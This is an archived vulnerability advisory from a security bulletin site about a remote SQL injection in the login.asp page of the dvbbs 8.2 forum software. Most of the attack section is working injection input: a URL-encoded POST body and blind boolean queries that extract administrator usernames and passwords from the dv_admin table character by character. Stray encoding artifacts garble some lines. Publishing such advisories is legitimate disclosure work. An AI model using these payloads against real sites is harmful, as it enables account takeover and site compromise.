Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: bx3361.htm

dvbbs8.2(access/sql)version login.asp remote sql injection



dvbbs8.2(access/sql)version login.asp remote sql injection
dvbbs8.2(access/sql)version login.asp remote sql injection



name:=0D
where (topsec security research group)=0D
=0D
email:=0D
hackerb@hotmail.com=0D 
=0D
Subject:=0D
dvbbs8.2(access/sql)version login.asp remote sql injection=0D
=0D
danger level:=0D
critical/High=0D
=0D
info:=0D
dvbbs is prone to multiple sql injection security flaw=0D
=0D
interrelated code to access version(exp):=0D
password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271=0D
=0D
Examples(access version):=0D
decide=0D
Where=92 and =911=92==921=0D
where=92 and =911=92==922=0D
to get usernamer or password=0D
where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1=0D
where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1=0D
.......................=0D
.......................=0D
where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1=0D
where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1=0D
......................=0D
......................=0D
=0D
Solution:=0D
Authorities patch =0D
dvbbs web site(http://www.dvbbs.net)=0D 
=0D
References:=0D
dvbbs(http://www.dvbbs.net) 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH